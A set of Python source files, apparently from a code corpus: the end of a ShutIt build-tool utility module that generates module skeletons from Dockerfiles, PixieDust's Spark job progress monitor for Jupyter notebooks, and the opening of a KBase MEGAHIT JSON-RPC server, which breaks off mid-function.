shutit.log('Ignoring directory: ' + path + ' as it has a STOPBUILD file in it. Pass --ignorestop to shutit run to override.', force_stdout=True)
return
for sub in glob.glob(os.path.join(path, '*')):
subpath = os.path.join(path, sub)
if os.path.isfile(subpath):
load_mod_from_file(shutit, subpath)
elif os.path.isdir(subpath):
load_all_from_path(shutit, subpath)
def load_mod_from_file(shutit, fpath):
"""Loads modules from a .py file into ShutIt if there are no modules from
this file already.
We expect to have a callable 'module/0' which returns one or more module
objects.
If this doesn't exist we assume that the .py file works in the old style
(automatically inserting the module into shutit_global) or it's not a shutit
module.
"""
fpath = os.path.abspath(fpath)
file_ext = os.path.splitext(os.path.split(fpath)[-1])[-1]
if file_ext.lower() != '.py':
return
if re.match('.*\/context\/.*',fpath):
shutit.log('Ignoring file: "' + fpath + '" as this appears to be part of the context directory')
return
# Do we already have modules from this file? If so we know we can skip.
# Note that this attribute will only be set for 'new style' module loading,
# this should be ok because 'old style' loading checks for duplicate
# existing modules.
# TODO: this is quadratic complexity
existingmodules = [
m for m in shutit.shutit_modules
if getattr(m, '__module_file', None) == fpath
]
if len(existingmodules) > 0:
return
# Looks like it's ok to load this file
if shutit.cfg['build']['debug']:
shutit.log('Loading source for: ' + fpath)
# Add this directory to the python path iff not already there.
directory = os.path.dirname(fpath)
if directory not in sys.path:
sys.path.append(os.path.dirname(fpath))
mod_name = base64.b32encode(fpath).replace('=', '')
pymod = imp.load_source(mod_name, fpath)
# Got the python module, now time to pull the shutit module(s) out of it.
targets = [
('module', shutit.shutit_modules), ('conn_module', shutit.conn_modules)
]
shutit.cfg['build']['source'] = {}
for attr, target in targets:
modulefunc = getattr(pymod, attr, None)
# Old style or not a shutit module, nothing else to do
if not callable(modulefunc):
return
modules = modulefunc()
if type(modules) is not list:
modules = [modules]
for module in modules:
setattr(module, '__module_file', fpath)
ShutItModule.register(module.__class__)
target.add(module)
shutit.cfg['build']['source'][fpath] = open(fpath).read()
# Build report
def build_report(shutit, msg=''):
"""Resposible for constructing a report to be output as part of the build.
Retrurns report as a string.
"""
s = ''
s += '################################################################################\n'
s += '# COMMAND HISTORY BEGIN ' + shutit_global.cfg['build']['build_id'] + '\n'
s += get_commands(shutit)
s += '# COMMAND HISTORY END ' + shutit_global.cfg['build']['build_id'] + '\n'
s += '################################################################################\n'
s += '################################################################################\n'
s += '# BUILD REPORT FOR BUILD BEGIN ' + shutit_global.cfg['build']['build_id'] + '\n'
s += '# ' + msg + '\n'
if shutit_global.cfg['build']['report'] != '':
s += shutit_global.cfg['build']['report'] + '\n'
else:
s += '# Nothing to report\n'
if 'container_id' in shutit.cfg['target']:
s += '# CONTAINER_ID: ' + shutit.cfg['target']['container_id'] + '\n'
s += '# BUILD REPORT FOR BUILD END ' + shutit_global.cfg['build']['build_id'] + '\n'
s += '###############################################################################\n'
return s
def get_commands(shutit):
"""Gets command that have been run and have not been redacted.
"""
s = ''
for c in shutit.shutit_command_history:
if type(c) == str:
s += c + '\n'
return s
def get_hash(string):
"""Helper function to get preceding integer
eg com.openbet == 1003189494
>>> import binascii
>>> abs(binascii.crc32('shutit.tk'))
782914092
Recommended means of determining run order integer part.
"""
return abs(binascii.crc32(string))
def create_skeleton(shutit):
"""Helper function to create a standard module directory ready to run
and tinker with.
"""
shutit_dir = sys.path[0]
# Set up local directories
skel_path = shutit.cfg['skeleton']['path']
skel_module_name = shutit.cfg['skeleton']['module_name']
skel_domain = shutit.cfg['skeleton']['domain']
skel_domain_hash = shutit.cfg['skeleton']['domainhash']
skel_depends = shutit.cfg['skeleton']['depends']
skel_base_image = shutit.cfg['skeleton']['base_image']
skel_script = shutit.cfg['skeleton']['script']
skel_example = shutit.cfg['skeleton']['example']
skel_dockerfile = shutit.cfg['skeleton']['dockerfile']
# Set up dockerfile cfg
shutit.cfg['dockerfile']['base_image'] = skel_base_image
shutit.cfg['dockerfile']['cmd'] = '/bin/bash'
shutit.cfg['dockerfile']['user'] = ''
shutit.cfg['dockerfile']['maintainer'] = ''
shutit.cfg['dockerfile']['entrypoint'] = ''
shutit.cfg['dockerfile']['expose'] = []
shutit.cfg['dockerfile']['env'] = []
shutit.cfg['dockerfile']['volume'] = []
shutit.cfg['dockerfile']['onbuild'] = []
shutit.cfg['dockerfile']['script'] = []
# Check setup
if len(skel_path) == 0 or skel_path[0] != '/':
shutit.fail('Must supply a directory and it must be absolute')
if os.path.exists(skel_path):
shutit.fail(skel_path + ' already exists')
if len(skel_module_name) == 0:
shutit.fail('Must supply a name for your module, eg mymodulename')
if not re.match('^[a-zA-z_][0-9a-zA-Z_]+$', skel_module_name):
shutit.fail('Module names must comply with python classname standards: cf: http://stackoverflow.com/questions/10120295/valid-characters-in-a-python-class-name')
if len(skel_domain) == 0:
shutit.fail('Must supply a domain for your module, eg com.yourname.madeupdomainsuffix')
os.makedirs(skel_path)
os.mkdir(os.path.join(skel_path, 'configs'))
os.mkdir(os.path.join(skel_path, 'context'))
os.mkdir(os.path.join(skel_path, 'bin'))
os.mkdir(os.path.join(skel_path, 'dockerfile'))
templatemodule_path = os.path.join(skel_path, skel_module_name + '.py')
readme_path = os.path.join(skel_path, 'README.md')
buildsh_path = os.path.join(skel_path, 'bin', 'build.sh')
testsh_path = os.path.join(skel_path, 'bin', 'test.sh')
runsh_path = os.path.join(skel_path, 'bin', 'run.sh')
buildpushsh_path = os.path.join(skel_path, 'bin', 'build_and_push.sh')
buildcnf_path = os.path.join(skel_path, 'configs', 'build.cnf')
pushcnf_path = os.path.join(skel_path, 'configs', 'push.cnf')
builddockerfile_path = os.path.join(skel_path, 'Dockerfile')
if skel_dockerfile:
if os.path.basename(skel_dockerfile) != 'Dockerfile':
skel_dockerfile += '/Dockerfile'
if not os.path.exists(skel_dockerfile):
if urlparse.urlparse(skel_dockerfile)[0] == '':
shutit.fail('Dockerfile "' + skel_dockerfile + '" must exist')
dockerfile_contents = urllib2.urlopen(skel_dockerfile).read()
dockerfile_dirname = None
else:
dockerfile_contents = open(skel_dockerfile).read()
dockerfile_dirname = os.path.dirname(skel_dockerfile)
if dockerfile_dirname == '':
shutit.fail('Dockerfile must be absolute')
if os.path.exists(dockerfile_dirname):
shutil.rmtree(skel_path + '/context')
shutil.copytree(dockerfile_dirname, skel_path + '/context')
# Remove Dockerfile as it's not part of the context.
if os.path.isfile(skel_path + '/context/Dockerfile'):
os.remove(skel_path + '/context/Dockerfile')
# Change to this context
os.chdir(dockerfile_dirname)
# Wipe the command as we expect one in the file.
shutit.cfg['dockerfile']['cmd'] = ''
dockerfile_list = parse_dockerfile(shutit, dockerfile_contents)
# Set defaults from given dockerfile
for item in dockerfile_list:
# These items are not order-dependent and don't affect the build, so we collect them here:
docker_command = item[0].upper()
if docker_command == 'FROM':
# Should be only one of these
shutit.cfg['dockerfile']['base_image'] = item[1]
elif docker_command == "ONBUILD":
# Maps to finalize :) - can we have more than one of these? assume yes
# This contains within it one of the above commands, so we need to abstract this out.
shutit.cfg['dockerfile']['onbuild'].append(item[1])
elif docker_command == "MAINTAINER":
shutit.cfg['dockerfile']['maintainer'] = item[1]
elif docker_command == "VOLUME":
# Put in the run.sh.
try:
shutit.cfg['dockerfile']['volume'].append(' '.join(json.loads(item[1])))
except:
shutit.cfg['dockerfile']['volume'].append(item[1])
elif docker_command == 'EXPOSE':
# Put in the run.sh.
shutit.cfg['dockerfile']['expose'].append(item[1])
elif docker_command == "ENTRYPOINT":
# Put in the run.sh? Yes, if it exists it goes at the front of cmd
try:
shutit.cfg['dockerfile']['entrypoint'] = ' '.join(json.loads(item[1]))
except:
shutit.cfg['dockerfile']['entrypoint'] = item[1]
elif docker_command == "CMD":
# Put in the run.sh
try:
shutit.cfg['dockerfile']['cmd'] = ' '.join(json.loads(item[1]))
except:
shutit.cfg['dockerfile']['cmd'] = item[1]
# Other items to be run through sequentially (as they are part of the script)
if docker_command == "USER":
# Put in the start script as well as su'ing from here - assuming order dependent?
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
# We assume the last one seen is the one we use for the image.
# Put this in the default start script.
shutit.cfg['dockerfile']['user'] = item[1]
elif docker_command == 'ENV':
# Put in the run.sh.
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
# Set in the build
shutit.cfg['dockerfile']['env'].append(item[1])
elif docker_command == "RUN":
# Only handle simple commands for now and ignore the fact that Dockerfiles run
# with /bin/sh -c rather than bash.
try:
shutit.cfg['dockerfile']['script'].append((docker_command, ' '.join(json.loads(item[1]))))
except:
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "ADD":
# Send file - is this potentially got from the web? Is that the difference between this and COPY?
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "COPY":
# Send file
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "WORKDIR":
# Push and pop
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
elif docker_command == "COMMENT":
# Push and pop
shutit.cfg['dockerfile']['script'].append((docker_command, item[1]))
# We now have the script, so let's construct it inline here
templatemodule = ''
# Header.
templatemodule += '''
# Created from dockerfile: ''' + skel_dockerfile + '''
# Maintainer: ''' + shutit.cfg['dockerfile']['maintainer'] + '''
from shutit_module import ShutItModule
class template(ShutItModule):
def is_installed(self, shutit):
return False
'''
# build
build = ''
numpushes = 0
wgetgot = False
for item in shutit.cfg['dockerfile']['script']:
dockerfile_command = item[0].upper()
dockerfile_args = item[1].split()
cmd = ' '.join(dockerfile_args).replace("'", "\\'")
if dockerfile_command == 'RUN':
build += """\n\t\tshutit.send('""" + cmd + """')"""
elif dockerfile_command == 'WORKDIR':
build += """\n\t\tshutit.send('pushd """ + cmd + """')"""
numpushes = numpushes + 1
elif dockerfile_command == 'COPY' or dockerfile_command == 'ADD':
# The <src> path must be inside the context of the build; you cannot COPY ../something /something, because the first step of a docker build is to send the context directory (and subdirectories) to the docker daemon.
if dockerfile_args[0][0:1] == '..' or dockerfile_args[0][0] == '/' or dockerfile_args[0][0] == '~':
shutit.fail('Invalid line: ' + str(dockerfile_args) + ' file must be in local subdirectory')
if dockerfile_args[1][-1] == '/':
# Dir we're COPYing or ADDing to
destdir = dockerfile_args[1]
# File/dir we're COPYing or ADDing from
fromfile = dockerfile_args[0]
# Final file/dir
outfile = destdir + fromfile
if os.path.isfile(fromfile):
outfiledir = os.path.dirname(fromfile)
build += """\n\t\tshutit.send('mkdir -p """ + destdir + '/' + outfiledir + """')"""
elif os.path.isdir(fromfile):
build += """\n\t\tshutit.send('mkdir -p """ + destdir + fromfile + """')"""
else:
outfile = dockerfile_args[1]
# If this is something we have to wget:
if dockerfile_command == 'ADD' and urlparse.urlparse(dockerfile_args[0])[0] != '':
if not wgetgot:
build += """\n\t\tshutit.install('wget')"""
wgetgot = True
if dockerfile_args[1][-1] == '/':
destdir = destdir[0:-1]
outpath = urlparse.urlparse(dockerfile_args[0])[2]
outpathdir = os.path.dirname(outpath)
build += """\n\t\tshutit.send('mkdir -p """ + destdir + outpathdir + """')"""
build += """\n\t\tshutit.send('wget -O """ + destdir + outpath + ' ' + dockerfile_args[0] + """')"""
else:
outpath = dockerfile_args[1]
destdir = os.path.dirname(dockerfile_args[1])
build += """\n\t\tshutit.send('mkdir -p """ + destdir + """')"""
build += """\n\t\tshutit.send('wget -O """ + outpath + ' ' + dockerfile_args[0] + """')"""
else:
# From the local filesystem on construction:
localfile = dockerfile_args[0]
# Local file location on build:
buildstagefile = 'context/' + dockerfile_args[0]
## TODO replace with sha1
#tmpstr = 'aksljdfhaksfhd'
#if localfile[-4:] == '.tar':
# build += """\n\t\tshutit.send_file('""" + outfile + '/' + localfile + """')"""
#elif localfile[-4:] == '.bz2':
#elif localfile[-3:] == '.gz':
#elif localfile[-3:] == '.xz':
if os.path.isdir(localfile):
build += """\n\t\tshutit.send_host_dir('""" + outfile + """', '""" + buildstagefile + """')"""
else:
build += """\n\t\tshutit.send_host_file('""" + outfile + """', '""" + buildstagefile + """')"""
elif dockerfile_command == 'ENV':
cmd = '='.join(dockerfile_args).replace("'", "\\'")
build += """\n\t\tshutit.send('export """ + '='.join(dockerfile_args) + """')"""
elif dockerfile_command == 'COMMENT':
build += """\n\t\t# """ + ' '.join(dockerfile_args)
while numpushes > 0:
build += """\n\t\tshutit.send('popd')"""
numpushes = numpushes - 1
templatemodule += '''
def build(self, shutit):''' + build + '''
return True
'''
# Gather and place finalize bit
finalize = ''
for line in shutit.cfg['dockerfile']['onbuild']:
finalize += '\n\t\tshutit.send(\'' + line + '\''
templatemodule += '''
def finalize(self, shutit):''' + finalize + '''
return True
def test(self, shutit):
return True
def is_installed(self, shutit):
return False
def get_config(self, shutit):
return True
'''
templatemodule += """
def module():
return template(
""" + """\'%s.%s.%s\'""" % (skel_domain, skel_module_name, skel_module_name) + """, """ + skel_domain_hash + ".00" + """,
description='',
maintainer='""" + shutit.cfg['dockerfile']['maintainer'] + """',
depends=['%s""" % (skel_depends) + """']
)
"""
# Return program to main shutit_dir
if dockerfile_dirname:
os.chdir(shutit_dir)
elif skel_example:
templatemodule = open(os.path.join(shutit_dir, 'assets', 'shutit_module_template.py')).read()
else:
templatemodule = open(os.path.join(shutit_dir, 'assets', 'shutit_module_template_bare.py')).read()
templatemodule = (templatemodule
).replace('template', skel_module_name
).replace('GLOBALLY_UNIQUE_STRING', '\'%s.%s.%s\'' % (skel_domain, skel_module_name, skel_module_name)
).replace('FLOAT', skel_domain_hash + '.00'
).replace('DEPENDS', skel_depends
)
readme = skel_module_name + ': description of module directory in here'
buildsh = textwrap.dedent('''\
#!/bin/bash
[[ -z "$SHUTIT" ]] && SHUTIT="$1/shutit"
[[ ! -a "$SHUTIT" ]] || [[ -z "$SHUTIT" ]] && SHUTIT="$(which shutit)"
if [[ ! -a "$SHUTIT" ]]
then
echo "Must have shutit on path, eg export PATH=$PATH:/path/to/shutit_dir"
exit 1
fi
pushd ..
$SHUTIT build --shutit_module_path $(dirname $SHUTIT)/library "$@"
if [[ $? != 0 ]]
then
popd
exit 1
fi
popd
''')
testsh = textwrap.dedent('''\
#!/bin/bash
# Test the building of this module
if [ $0 != test.sh ] && [ $0 != ./test.sh ]
then
echo
echo "Called as: $0"
echo "Must be run as test.sh or ./test.sh"
exit
fi
./build.sh "$@"
''')
volumes_arg = ''
for varg in shutit.cfg['dockerfile']['volume']:
volumes_arg += ' -v ' + varg + ':' + varg
ports_arg = ''
if type(shutit.cfg['dockerfile']['expose']) == str:
for parg in shutit.cfg['dockerfile']['expose']:
ports_arg += ' -p ' + parg + ':' + parg
else:
for parg in shutit.cfg['dockerfile']['expose']:
for port in parg.split():
ports_arg += ' -p ' + port + ':' + port
env_arg = ''
for earg in shutit.cfg['dockerfile']['env']:
env_arg += ' -e ' + earg.split()[0] + ':' + earg.split()[1]
runsh = textwrap.dedent('''\
#!/bin/bash
# Example for running
docker run -t -i''' + ports_arg + volumes_arg + env_arg + ' ' + skel_module_name + ' ' + shutit.cfg['dockerfile']['entrypoint'] + ' ' + shutit.cfg['dockerfile']['cmd'] + '\n')
buildpushsh = textwrap.dedent('''\
export SHUTIT_OPTIONS="$SHUTIT_OPTIONS --config configs/push.cnf -s repository push yes"
./build.sh "$@"
''')
buildcnf = textwrap.dedent('''\
###############################################################################
# PLEASE NOTE: This file should be changed only by the maintainer.
# PLEASE NOTE: This file is only sourced if the "shutit build" command is run
# and this file is in the relative path: configs/build.cnf
# This is to ensure it is only sourced if _this_ module is the
# target.
###############################################################################
# When this module is the one being built, which modules should be built along with it by default?
# This feeds into automated testing of each module.
[''' + '%s.%s.%s' % (skel_domain, skel_module_name, skel_module_name) + ''']
shutit.core.module.build:yes
# Allowed images as a regexp, eg ["ubuntu:12.*"], or [".*"], or ["centos"].
# It's recommended this is locked down as far as possible.
shutit.core.module.allowed_images:["''' + shutit.cfg['dockerfile']['base_image'] + '''"]
# Aspects of build process
[build]
base_image:''' + shutit.cfg['dockerfile']['base_image'] + '''
[repository]
name:''' + skel_module_name + '''
''')
pushcnf = textwrap.dedent('''\
###############################################################################
# PLEASE NOTE: This file should be changed only by the maintainer.
# PLEASE NOTE: IF YOU WANT TO CHANGE THE CONFIG, PASS IN
# --config configfilename
# OR ADD DETAILS TO YOUR
# ~/.shutit/config
# FILE
###############################################################################
[target]
rm:false
[repository]
# COPY THESE TO YOUR ~/.shutit/config FILE AND FILL OUT ITEMS IN CAPS
#user:YOUR_USERNAME
## Fill these out in server- and username-specific config (also in this directory)
#password:YOUR_REGISTRY_PASSWORD_OR_BLANK
## Fill these out in server- and username-specific config (also in this directory)
#email:YOUR_REGISTRY_EMAIL_OR_BLANK
#tag:no
#push:yes
#save:no
#export:no
##server:REMOVE_ME_FOR_DOCKER_INDEX
## tag suffix, defaults to "latest", eg registry/username/repository:latest.
## empty is also "latest"
#tag_name:latest
#suffix_date:no
#suffix_format:%s
''')
builddockerfile = textwrap.dedent('''\
FROM ''' + shutit.cfg['dockerfile']['base_image'] + '''
RUN apt-get update
RUN apt-get install -y -qq curl git python-pip
WORKDIR /opt
RUN git clone https://github.com/ianmiell/shutit.git
WORKDIR shutit
RUN pip install -r requirements.txt
WORKDIR ''' + skel_path + ''' <- TODO You will likely need to to change this
RUN /opt/shutit/shutit build --shutit_module_path /opt/shutit/library --delivery bash
CMD ["/bin/bash"]
''')
open(templatemodule_path, 'w').write(templatemodule)
open(readme_path, 'w').write(readme)
open(builddockerfile_path, 'w').write(builddockerfile)
open(buildsh_path, 'w').write(buildsh)
os.chmod(buildsh_path, os.stat(buildsh_path).st_mode | 0111) # chmod +x
open(testsh_path, 'w').write(testsh)
os.chmod(testsh_path, os.stat(testsh_path).st_mode | 0111) # chmod +x
open(runsh_path, 'w').write(runsh)
os.chmod(runsh_path, os.stat(runsh_path).st_mode | 0111) # chmod +x
open(buildpushsh_path, 'w').write(buildpushsh)
os.chmod(buildpushsh_path, os.stat(buildpushsh_path).st_mode | 0111) # chmod +x
# build.cnf should be read-only (maintainer changes only)
open(buildcnf_path, 'w').write(buildcnf)
os.chmod(buildcnf_path, 0400)
open(pushcnf_path, 'w').write(pushcnf)
os.chmod(pushcnf_path, 0600)
if skel_script is not None:
print textwrap.dedent('''\
================================================================================
Please note that your bash script in:
''' + skel_script + '''
should be a simple set of one-liners
that return to the prompt. Anything fancy with ifs, backslashes or other
multi-line commands need to be handled more carefully.
================================================================================''')
# egrep removes leading space
# grep removes comments
# sed1 ensures no confusion with double quotes
# sed2 replaces script lines with shutit code
# sed3 uses treble quotes for simpler escaping of strings
sbsi = '/tmp/shutit_bash_script_include_' + str(int(time.time()))
skel_mod_path = os.path.join(skel_path, skel_module_name + '.py')
# TODO: we probably don't need all these external programs any more
calls = [
#egrep -v '^[\s]*$' myscript.sh | grep -v '^#' | sed "s/"$/" /;s/^/ shutit.send("""/;s/$/""")/" > /tmp/shutit_bash_script_include_1400206744
r'''egrep -v '^[\s]*$' ''' + skel_script + r''' | grep -v '^#' | sed "s/\"$/\" /;s/^/\t\tshutit.send(\"\"\"/;s/$/\"\"\")/" > ''' + sbsi,
r'''sed "10r ''' + sbsi + '" ' + skel_mod_path + ' > ' + skel_mod_path + '.new''',
r'''mv ''' + skel_mod_path + '''.new ''' + skel_mod_path
]
for call in calls:
subprocess.check_call(['bash', '-c', call])
# Are we creating a new folder inside an existing git repo?
if subprocess.call(['git', 'status'], stdout=open(os.devnull, 'wb')) != 0:
subprocess.check_call(['git', 'init'], cwd=skel_path)
subprocess.check_call([
'cp', os.path.join(shutit_dir, '.gitignore'), '.gitignore'
], cwd=skel_path)
print textwrap.dedent('''\
================================================================================
Run:
cd ''' + skel_path + ' && ' + shutit_dir + '''/shutit build --interactive 3
and follow the tutorial, or:
cd ''' + skel_path + '''/bin && ./build.sh
to just go ahead and build it.
An image called ''' + skel_module_name + ''' will be created either way, and
can be run with the run.sh command.
================================================================================''')
# Parses the dockerfile (passed in as a string)
# and info to extract, and returns a list with the information in a more canonical form, still ordered.
def parse_dockerfile(shutit, contents):
ret = []
full_line = ''
for l in contents.split('\n'):
# Handle continuations
if len(l) > 0:
if l[-1] == '\\':
full_line += l[0:-1]
pass
else:
full_line += l
m = re.match("^[\s]*([A-Za-z]+)[\s]*(.*)$", full_line)
m1 = None
if m:
ret.append([m.group(1), m.group(2)])
else:
m1 = re.match("^#(..*)$", full_line)
if m1:
ret.append(['COMMENT', m1.group(1)])
else:
shutit.log("Ignored line in parse_dockerfile: " + l)
full_line = ''
return ret
def util_raw_input(shutit=None, prompt='', default=None):
"""Handles raw_input calls, and switches off interactivity if there is apparently
no controlling terminal (or there are any other problems)
"""
msg = ''
if shutit and shutit.cfg['build']['interactive'] == 0:
return default
if not determine_interactive(shutit):
return default
try:
return raw_input(prompt)
except:
msg = 'Problems getting raw input, assuming no controlling terminal.'
if shutit:
set_noninteractive(shutit,msg=msg)
return default
def determine_interactive(shutit=None):
"""Determine whether we're in an interactive context.
Sets interactivity off if appropriate.
cf http://stackoverflow.com/questions/24861351/how-to-detect-if-python-script-is-being-run-as-a-background-process
"""
try:
if not sys.stdout.isatty() or os.getpgrp() != os.tcgetpgrp(sys.stdout.fileno()):
if shutit != None:
set_noninteractive(shutit)
return False
except:
if shutit != None:
set_noninteractive(shutit,msg='Problems determining interactivity, assuming not.')
return False
return True
def set_noninteractive(shutit,msg="setting non-interactive"):
shutit.log(msg)
shutit.cfg['build']['interactive'] = 0
return
def print_stack_trace():
print '================================================================================'
print 'Strack trace was:\n================================================================================'
import traceback
(a,b,c) = sys.exc_info()
traceback.print_tb(c)
print '================================================================================'
in_ctrlc = False
def ctrlc_background():
global in_ctrlc
in_ctrlc = True
time.sleep(1)
in_ctrlc = False
def ctrl_c_signal_handler(signal, frame):
"""CTRL-c signal handler - enters a pause point if it can.
"""
if in_ctrlc:
print "CTRL-c quit!"
# Unfortunately we have 'except' blocks catching all exceptions,
# so we can't use sys.exit
os._exit(1)
if False and 'shutit' in frame.f_locals:
shutit = frame.f_locals['shutit']
#print shutit
shutit.pause_point(msg='Captured CTRL-c - entering pause point')
else:
t = threading.Thread(target=ctrlc_background)
t.daemon = True
t.start()
print "CTRL-c caught, but not in context with ability to pause. CTRL-c twice to quit."
|
sparkJobProgressMonitor.py | # -------------------------------------------------------------------------------
# Copyright IBM Corp. 2017
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------------
from pixiedust.utils.template import PixiedustTemplateEnvironment
from IPython.core.getipython import *
from IPython.display import display, HTML, Javascript
from pixiedust.utils.shellAccess import ShellAccess
from pixiedust.utils.environment import Environment
from functools import reduce
import uuid
import json
import sys
import traceback
import pixiedust
from IPython.core.getipython import get_ipython
from collections import OrderedDict
from threading import Thread, Lock, Event
import time
myLogger = pixiedust.getLogger(__name__)
_env = PixiedustTemplateEnvironment()
progressMonitor = None
loadingProgressMonitor = False
def enableSparkJobProgressMonitor():
if Environment.isRunningOnDSX:
print("Spark Job Progress Monitoring cannot be started on DSX")
return
global progressMonitor, loadingProgressMonitor
if progressMonitor is None and not loadingProgressMonitor:
loadingProgressMonitor = True
def startSparkJobProgressMonitor():
global progressMonitor
progressMonitor = SparkJobProgressMonitor()
t = Thread(target=startSparkJobProgressMonitor)
t.daemon = True
t.start()
print("Succesfully enabled Spark Job Progress Monitor")
else:
print("Spark Job Progress Monitor already enabled")
class SparkJobProgressMonitorOutput(Thread):
class Java:
implements = ["com.ibm.pixiedust.PixiedustOutputListener"]
def __init__(self):
super(SparkJobProgressMonitorOutput,self).__init__()
self.prefix = None
self.lock = Lock()
self.triggerEvent = Event()
self.daemon = True
self.progressData = OrderedDict()
def getUpdaterId(self):
return "updaterId{0}".format(self.prefix)
def getProgressHTMLId(self):
return "progress{0}".format(self.prefix)
def run(self):
while True:
self.triggerEvent.wait()
with self.lock:
self.triggerEvent.clear()
if bool(self.progressData):
progressData = self.progressData
self.progressData = OrderedDict()
else:
progressData = OrderedDict()
if bool(progressData):
js = ""
for data in progressData.values():
channel = data["channel"]
if channel=="jobStart":
js += _env.getTemplate("sparkJobProgressMonitor/addJobTab.js").render(
prefix=self.prefix, data=data, overalNumTasks=reduce(lambda x,y:x+y["numTasks"], data["stageInfos"], 0)
)
elif channel=="stageSubmitted":
js += _env.getTemplate("sparkJobProgressMonitor/updateStageStatus.js").render(
prefix=self.prefix, stageId=data["stageInfo"]["stageId"], status="Submitted", host=None
)
elif channel=="taskStart":
js += _env.getTemplate("sparkJobProgressMonitor/taskStart.js").render( prefix=self.prefix, data=data, increment = data["increment"] )
js += "\n"
js += _env.getTemplate("sparkJobProgressMonitor/updateStageStatus.js").render(
prefix=self.prefix, stageId=data["stageId"], status="Running",
host="{0}({1})".format(data["taskInfo"]["executorId"],data["taskInfo"]["host"] )
)
elif channel=="stageCompleted":
js += _env.getTemplate("sparkJobProgressMonitor/updateStageStatus.js").render(
prefix=self.prefix, stageId=data["stageInfo"]["stageId"], status="Completed", host=None
)
elif channel=="jobEnd":
js += _env.getTemplate("sparkJobProgressMonitor/jobEnded.js").render(
prefix=self.prefix, jobId=data["jobId"]
)
js += "\n"
display(Javascript(js))
time.sleep(0.5)
def display_with_id(self, obj, display_id, update=False):
"""Create a new display with an id"""
ip = get_ipython()
if hasattr(ip, "kernel"):
data, md = ip.display_formatter.format(obj)
content = {
'data': data,
'metadata': md,
'transient': {'display_id': display_id},
}
msg_type = 'update_display_data' if update else 'display_data'
ip.kernel.session.send(ip.kernel.iopub_socket, msg_type, content, parent=ip.parent_header)
else:
display(obj)
def printOutput(self, s):
print(s)
def sendChannel(self, channel, data):
self.printStuff(channel, data)
def onRunCell(self):
self.prefix = str(uuid.uuid4())[:8]
#Create the place holder area for the progress monitor
self.display_with_id(
HTML( _env.getTemplate("sparkJobProgressMonitor/pmLayout.html").render( prefix = self.prefix)),self.getProgressHTMLId()
)
def printStuff(self,channel, s):
try:
data = json.loads(s)
data["channel"] = channel
data["increment"] = 1
key = None
if channel=="jobStart":
key = "{0}-{1}".format(channel,data["jobId"])
elif channel=="stageSubmitted":
key = "{0}-{1}".format(channel,data["stageInfo"]["stageId"])
elif channel=="taskStart":
key = "{0}-{1}".format(channel,data["stageId"])
elif channel=="stageCompleted":
key = "{0}-{1}".format(channel,data["stageInfo"]["stageId"])
elif channel=="jobEnd":
key = "{0}-{1}".format(channel,data["jobId"])
if key:
with self.lock:
if key in self.progressData:
data["increment"] = self.progressData[key]["increment"] + 1
self.progressData[key] = data
self.triggerEvent.set()
except:
print("Unexpected error: {0} - {1} : {2}".format(channel, s, sys.exc_info()[0]))
traceback.print_exc()
class SparkJobProgressMonitor(object):
def __init__(self):
self.monitorOutput = None
self.addSparkListener()
self.displayRuns={}
self.newDisplayRun = False
def onDisplayRun(self, contextId):
if contextId is None or self.monitorOutput is None:
self.newDisplayRun=True
return
cellContext = self.displayRuns.get( contextId )
if cellContext and cellContext != self.monitorOutput.prefix:
#switch the cell context if not a new display Run
if self.newDisplayRun:
self.displayRuns.pop( contextId, None )
else:
self.monitorOutput.prefix = cellContext
elif cellContext is None:
self.displayRuns[contextId] = self.monitorOutput.prefix
if cellContext:
display(Javascript(_env.getTemplate("sparkJobProgressMonitor/emptyTabs.js").render(prefix=cellContext)))
self.newDisplayRun=False
def addSparkListener(self):
try:
get_ipython().run_cell_magic(
"scala",
"cl=sparkProgressMonitor noSqlContext",
_env.getTemplate("sparkJobProgressMonitor/addSparkListener.scala").render()
)
listener = get_ipython().user_ns.get("__pixiedustSparkListener")
#access the listener object from the namespace
if listener:
self.monitorOutput = SparkJobProgressMonitorOutput()
self.monitorOutput.start()
#Add pre_run_cell event handler
get_ipython().events.register('pre_run_cell',lambda: self.monitorOutput.onRunCell() )
listener.setChannelListener( self.monitorOutput )
except:
myLogger.exception("Unexpected error while adding Spark Listener")
raise
|
MEGAHITServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from MEGAHIT.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MEGAHIT'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MEGAHIT.MEGAHITImpl import MEGAHIT # noqa @IgnorePep8
impl_MEGAHIT = MEGAHIT(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
